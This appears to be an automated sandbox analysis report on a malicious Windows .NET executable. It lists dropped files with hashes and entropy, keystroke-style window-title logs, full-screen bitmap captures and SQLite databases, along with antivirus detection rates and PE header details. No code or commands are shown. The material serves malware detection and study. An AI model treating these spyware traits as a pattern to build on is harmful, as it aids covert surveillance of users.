                                                                                      SHA-512:DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.695900624002646
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                      MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                      SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                      SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                      SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696310704606104
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:zUNjStS/jdkQzGpfenOSfXauumNY88ePld4qDJvq1iWWa1Jmqg:zptmzGpMOuXauuYY8tXJy1imKD
                                                                                      MD5:F4264A653604CF8A5BF393AA7BE6E818
                                                                                      SHA1:A909364A47943633E37B079FB8F7E71143294011
                                                                                      SHA-256:3D1CC7FE93C905BE207058E112EADA74EB472BCBE5BF855C5F85651DB4E062EE
                                                                                      SHA-512:D848F28195EBA8AFEBD7ECFB40BE28AFC0E36032D4183C7A7B2E2049D4BB8BE9B62F8D2497EEE308C24BD8BADADA4F524A6D983247B9CFAA16748C97C2C14F25
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696312162983912
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
                                                                                      MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
                                                                                      SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
                                                                                      SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
                                                                                      SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696835919052288
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                      MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                      SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                      SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                      SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697336881644685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                      MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                      SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                      SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                      SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                      Malicious:false
                                                                                      Preview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
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697336881644685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                      MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                      SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                      SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                      SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.688284131239007
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                      MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                      SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                      SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                      SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69156792375111
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                      MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                      SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                      SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                      SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69156792375111
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                      MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                      SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                      SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                      SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.700014595314478
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                      MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                      SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                      SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                      SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698801429970146
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                                      MD5:488BC4EF686937916ECE6285266A6075
                                                                                      SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                                      SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                                      SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698801429970146
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                                      MD5:488BC4EF686937916ECE6285266A6075
                                                                                      SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                                      SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                                      SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2607
                                                                                      Entropy (8bit):4.324649987933896
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:t6CCeo11111UuUuUuUuUuUuUuSSSSSSSDDDDDDtututututututuBBBBBBWWWWW5:v77777775
                                                                                      MD5:5297DBAF44A4DFF905040AD58028F050
                                                                                      SHA1:72FD50B113D9513E0FA48CE4855C017F66500F7C
                                                                                      SHA-256:7F0A346CAFEBB4621514CC5E7F1C411D825CE176A93856237D11486D9CEAF0DA
                                                                                      SHA-512:26BA7BE3A63A32BED0D3EFC8B12E45319511ECF7F62127C02A0C32FA497D3910F2B7C74F155E79E8E5491D1382BC67C620995C4A9434326C38BE23B59E40E50D
                                                                                      Malicious:false
                                                                                      Preview:..[14:46:27]<<Program Manager>>....[14:46:27]<<Program Manager>>....[14:46:28]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:39]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:40]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:41]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:42]<<Program Manager>>....[14:46:43]<<Program Manager>>....[14:46:43]<<Program Manager>>....[14:46:4
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):1353
                                                                                      Entropy (8bit):4.360555784684392
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:thNNNNSlllllllccccccccoSoSoSoSoSoSoSKKKKKKKBBBBBx:5xxxxxxD
                                                                                      MD5:78482DC2A7045CA6772B8AE697E375F1
                                                                                      SHA1:A70A36AC7F9CF19381B84E8BBF64F4203EEF7E3B
                                                                                      SHA-256:ECBFA7ED91F73B5E20C4A6F139CE13653B4C86F1302455D34D29624E14468F31
                                                                                      SHA-512:B4C42CB994FCCAB82F3C168910E24F5CA71CAED1546614F7DC9CC51D589A0CA7BB1BC0D75CAB63A091C2707C78CE495442669EC3BA7DDF48C4E0D7617030698C
                                                                                      Malicious:false
                                                                                      Preview:..[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:49]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:50]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:51]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:52]<<Program Manager>>....[14:47:53]<<Program Manager>>....[14:47:53]<<Program Manager>>....[14:47:53]<<Program Manager>>....[14:47:5
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2244
                                                                                      Entropy (8bit):4.363368894772879
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tIzIII1f1f1f1f1f1f1fSSSSSSSDDDDDDDssssssVVVVVVV+s+s+s+s+s+s+PN+P:trWWWWWr
                                                                                      MD5:D566E3085CCE22156FBD90830078D162
                                                                                      SHA1:B7BB53AC29030ED5C54912501F7699A807BF80B8
                                                                                      SHA-256:C1216F1653AD681F166B959523E7351A6E70FBC8E7471BB80388EC368AF9736D
                                                                                      SHA-512:C08BEB581A19DF6B67144FE3CA20AC0DFEA050571F651BF2FB0CB3F2383D896AD211AEF14FC759A9C9B3A8E13AE88013C3696F9319C2A259FDE4F575AEF1B9AD
                                                                                      Malicious:false
                                                                                      Preview:..[14:47:04]<<Program Manager>>....[14:47:04]<<Program Manager>>....[14:47:04]<<Program Manager>>....[14:47:04]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:05]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:06]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:07]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:08]<<Program Manager>>....[14:47:0
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.777741511521939
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:SByTDU5vdg3SYdfVssk2k+Beh7tRXngLJk77sdDGi2jS/eZJkV0bDZ+sIukCOvRC:rTevdhYdTpGizoYQ7SJnwW6X37
                                                                                      MD5:FC0184B3DC6E477B5F3784F39CCF84CD
                                                                                      SHA1:07FD545B7C032A395FE289F8115936FAE212671A
                                                                                      SHA-256:4A880377526D024748974AC57B2E531D40B3A29455F47F87E63348B505F69826
                                                                                      SHA-512:5483FA2A7968F221AFD93590562398AEF80C09670B023728CBFC07BE537DE41209C64DB76D92313E7F1EC3FA6D25BAB6D3007D13245CA2260AC500657955E239
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.734265430249111
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:S6bTDU5vdg3SYdfVssk2k+Beh7tRXngLJk77sdDGi2jS/eZJkV0bDZ+sIukCOvRM:BTevdhYdTpGizoYQ7mpdItEfjQ
                                                                                      MD5:9A3BF19DA7D23F6F26B96F4CBB35BD61
                                                                                      SHA1:31116775E740A775EA6D14851A8395D09678C5B9
                                                                                      SHA-256:BEF07AF03D86FFBD11E9465EB6B21C3561598C0C14AA05A259534C18541A4583
                                                                                      SHA-512:78018FFAE35D14603BBA90AC5D28B22B9A40738FFCDB7C32C53A62CA4B41B6CE6D3DD26B4FAA58D74F85074C44AD035168B10E83EE54000F529AD1AC13CC22CB
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.7777441118083175
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:S6bTDU5vdg3SYdfVssk2k+Beh7tRXngLJk77sdDGi2jS/eZJkV0bDZ+sIukCOvRC:BTevdhYdTpGizoYQ7SJnwW6X37
                                                                                      MD5:2C81483AF16DECA1CDC1B6BCE7DD9330
                                                                                      SHA1:9480D18E09678BF6401A6FF12B750F5A70F8B630
                                                                                      SHA-256:3394AFB6A7FE852EB51456009D960562FC9165BBF198BB6EB92348E3BD163AB1
                                                                                      SHA-512:B5639373437A3366CEC386E7869A730841699330FF5CFA327D321ACBE6715FE3F0D91AFFEBFBBE5F9F9FF5C1F6AB299BD96959DA1714A04B112FA750BAA18403
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):982528
                                                                                      Entropy (8bit):7.795157964876488
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:kuC6ldTmp/Qa+jm1fPoiyKNHkqkb4MOBFTpL6:46TKQxjiHByeHSO7F
                                                                                      MD5:4112AC3213933BFC8412B5312D17377F
                                                                                      SHA1:A5DB44AE45EDADD94DBC4B3E6F2875FA643C43F1
                                                                                      SHA-256:B57DFD0E1E8888EC1F8E23E8D8F32409B06367247CEF043394A19C7E4F0787FB
                                                                                      SHA-512:A72A3B151833DA1E61FD6569431E6F48395D66781B319E04AE5FED410C62D00B6719178E52552C91AEEA8A13B200BB5F7B42A9EB08305205AA7BA065E0BB629D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.795157964876488
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      File name:oS6KsQIqJxe038Y.exe
                                                                                      File size:982'528 bytes
                                                                                      MD5:4112ac3213933bfc8412b5312d17377f
                                                                                      SHA1:a5db44ae45edadd94dbc4b3e6f2875fa643c43f1
                                                                                      SHA256:b57dfd0e1e8888ec1f8e23e8d8f32409b06367247cef043394a19c7e4f0787fb
                                                                                      SHA512:a72a3b151833da1e61fd6569431e6f48395d66781b319e04ae5fed410c62d00b6719178e52552c91aeea8a13b200bb5f7b42a9eb08305205aa7ba065e0bb629d
                                                                                      SSDEEP:24576:kuC6ldTmp/Qa+jm1fPoiyKNHkqkb4MOBFTpL6:46TKQxjiHByeHSO7F
                                                                                      TLSH:162512843357DA02E5E60BB008B1E3B8277D3E5DA414D31B5EEDACFB383631AA555293
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{Eg..............0.................. ... ....@.. .......................`............@................................
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x4f1096
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67457B64 [Tue Nov 26 07:40:20 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
